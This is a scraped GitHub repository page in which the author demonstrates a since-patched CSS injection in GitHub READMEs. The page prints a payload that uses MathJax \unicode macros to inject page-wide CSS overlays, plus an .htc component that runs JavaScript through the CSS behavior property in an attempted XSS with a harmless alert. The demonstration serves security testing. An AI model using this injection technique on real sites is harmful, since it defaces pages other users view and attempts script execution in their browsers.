Skip to content
/ css-vuln Public

Created by tr4xnz to test out this CSS Injection vuln, my friend humancarpet18 discovered.

1 star 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

tr4xnz/css-vuln

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

17 Commits
README.md
README.md
 
 
Untitled.png
Untitled.png
 
 
github-css-vuln.pdf
github-css-vuln.pdf
 
 
script.htc
script.htc
 
 

Repository files navigation

GITHUB CSS VULN TEST >_<

image

The Github CSS Vuln, a vulnerability where README.md macros were exploited to edit the CSS on one's repository's page, and it'll be stored on the server. This vulnerability's discovery was very surprising as Github is like a huge platform where major companies and developers share their projects and ideas. Luckily the vulnerability was patched.

I still believed that an XSS attack was possible using CSS's ability to load in .htc files to run Javascript code.

script.htc

<PUBLIC:COMPONENT TAGNAME="xss">
  <PUBLIC:ATTACH EVENT="ondocumentready" ONEVENT="main()" LITERALCONTENT="false"/>
</PUBLIC:COMPONENT>
<SCRIPT>
  function main() {
    alert("Welcome to my github repo, ik very cool :P");
  }
</SCRIPT>

Hello i am tr4xnz
$$\ce{$\unicode[goombafont; color:red; z-index: -1; position: fixed; top: 0; left: 0; height: 100%; object-fit: cover; width: 100%; opacity: 0.7; background: url('https://raw.githubusercontent.com/tr4xnz/css-vuln/master/Untitled.png'); background-size: cover]{x0000}$} \ce{$\unicode[goombafont; color:red; z-index: 1000; position: fixed; left: 0; background-repeat: no-repeat; height: 300px; object-fit: cover; width: 300px; background: url('https://raw.githubusercontent.com/tr4xnz/css-vuln/master/Untitled.png'); background-size: cover]{x0000}$} \ce{$\unicode[goombafont; color:red; z-index: 1000; position: fixed; right: 5vh; background-repeat: no-repeat; height: 280px; object-fit: cover; width: 280px; background: url('https://raw.githubusercontent.com/tr4xnz/css-vuln/master/Untitled.png'); background-size: cover]{x0000}$} \ce{$\unicode[goombafont; color:red; z-index: 1000; position: fixed; left: 0; top: 12vh; background-repeat: no-repeat; height: 280px; object-fit: cover; width: 280px; background: url('https://raw.githubusercontent.com/tr4xnz/css-vuln/master/Untitled.png'); background-size: cover]{x0000}$} \ce{$\unicode[goombafont; color:red; z-index: 1000; position: fixed; right: 0; top: 4vh; background-repeat: no-repeat; height: 252px; object-fit: cover; width: 340px; background: url('https://raw.githubusercontent.com/tr4xnz/css-vuln/master/Untitled.png'); background-size: cover]{x0000}$} \ce{$\unicode[goombafont; color:red; z-index: 1000; position: fixed; right: 2vh; bottom: 0; background-repeat: no-repeat; height: 249px; object-fit: cover; width: 213px; background: url('https://raw.githubusercontent.com/tr4xnz/css-vuln/master/Untitled.png'); background-size: cover; behavior:url('script.htc')]{x0000}$}$$ $$\ce{$&#x5C;unicode[goombafont; color:red; pointer-events: none; z-index: -10; position: fixed; top: 0; left: 0; height: 100vh; object-fit: cover; background-size: cover; width: 130vw; opacity: 0.5; background: url('https://user-images.githubusercontent.com/30528167/92789817-e4b53d80-f3b3-11ea-96a4-dad3ea09d237.png?raw=true');]{x0000}$}$$

About

Created by tr4xnz to test out this CSS Injection vuln, my friend humancarpet18 discovered.

Topics

github css security injection vulnerability cyber tr4xnz dubz

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Packages

No packages published